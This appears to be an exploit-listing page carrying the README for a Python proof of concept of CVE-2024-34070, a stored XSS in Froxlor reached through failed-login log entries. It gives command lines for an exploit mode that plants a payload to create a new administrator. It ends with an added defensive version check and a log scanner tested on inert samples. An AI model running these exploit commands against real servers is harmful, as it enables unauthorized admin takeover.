## https://sploitus.com/exploit?id=B2320075-9374-5FD1-9A5C-1FB8B4C7FC00
# CVE-2024-34070 Froxlor PoC

Python proof of concept for CVE-2024-34070, a stored XSS vulnerability in Froxlor versions before 2.1.9 that is reached through failed login attempts recorded in the system log.

## WARNING

This project is for authorized security testing, CTF labs, and educational use only. Do not run this against systems you do not own or do not have explicit permission to test. The exploit mode can create an administrator account on the target Froxlor instance.

## Features

- Detect a Froxlor instance.
- Extract the Froxlor version from an authenticated admin session, when valid credentials are provided.
- Report whether the detected version is vulnerable (`< 2.1.9`).
- Inject the stored XSS payload that creates a new administrator.
- Verify whether the created administrator account can log in.

## Usage

Unauthenticated detection:

```bash
python3 main.py --url http://240.0.0.1:8080 --check
```

Authenticated detection, used to retrieve the exact Froxlor version:

```bash
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
```

Exploit mode, creating a new administrator:

```bash
python3 main.py --url http://240.0.0.1:8080 --exploit \
  --new-admin abcd \
  --new-password 'Abcd@@1234' \
  --new-email yldrmtest@gmail.com
```

Once an administrator (or an automation bot) views the Froxlor system log, the stored payload fires; from that point the verification step should redirect to `admin_index.php`, showing that the new administrator account can log in.

## Notes

- The script uses only the Python standard library.
- Without an authenticated admin session, the exact version may be unknown. In that case, `--check` can confirm Froxlor but cannot strictly determine vulnerability.
- The payload uses a relative URL (`/admin_admins.php`) so it works against the target instance instead of a hard-coded domain.
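The two defensive checks that follow from the description above (version strictly below 2.1.9, and login names carrying markup before they reach a log that an admin will render) as an added example; this is not code from the PoC or from Froxlor. The log line shape and the `user`/`from` fields are constructed assumptions for the demonstration, not Froxlor's real log format.

```python
import re
from typing import Iterable, List, Tuple

FIXED_VERSION = (2, 1, 9)  # Froxlor releases below this are affected per the PoC description


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.1.8' (optionally with a suffix such as '-rc1') into a comparable tuple."""
    numbers = re.findall(r"\d+", version.split("-")[0])
    if not numbers:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(n) for n in numbers)


def is_vulnerable_version(version: str) -> bool:
    """True when the reported Froxlor version is strictly below 2.1.9."""
    return parse_version(version) < FIXED_VERSION


# Markup that has no business in a login name: tags, inline event handlers, javascript: URLs.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]|\bon[a-zA-Z]+\s*=|javascript\s*:", re.IGNORECASE)
# Assumed (constructed) log line shape: "... failed login attempt for user 'NAME' from IP"
FAILED_LOGIN_RE = re.compile(r"failed login attempt for user '(?P<user>.*)' from (?P<ip>\S+)")

# Constructed sample log; the markup in lines 2 and 3 is inert and only exercises the detector.
SAMPLE_LOG = [
    "2024-05-01 10:00:01 froxlor: failed login attempt for user 'admin' from 198.51.100.7",
    "2024-05-01 10:00:05 froxlor: failed login attempt for user '<script>/*constructed*/</script>' from 198.51.100.7",
    "2024-05-01 10:01:00 froxlor: failed login attempt for user 'bob<b onmouseover=1>' from 203.0.113.9",
    "2024-05-01 10:02:00 froxlor: cron: running task 1",
]


def find_suspicious_failed_logins(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, username, ip) for failed logins whose login name carries markup."""
    hits = []
    for no, line in enumerate(lines, start=1):
        m = FAILED_LOGIN_RE.search(line)
        if m and MARKUP_RE.search(m.group("user")):
            hits.append((no, m.group("user"), m.group("ip")))
    return hits


if __name__ == "__main__":
    for ver in ("2.1.8", "2.1.9"):
        print(ver, "vulnerable" if is_vulnerable_version(ver) else "patched")
    for no, user, ip in find_suspicious_failed_logins(SAMPLE_LOG):
        print(f"line {no}: markup in login name {user!r} from {ip}")
```

The same markup test can be applied as an allow-list on the login form itself, so that a name containing tags is rejected (or HTML-escaped) before anything is written to the log.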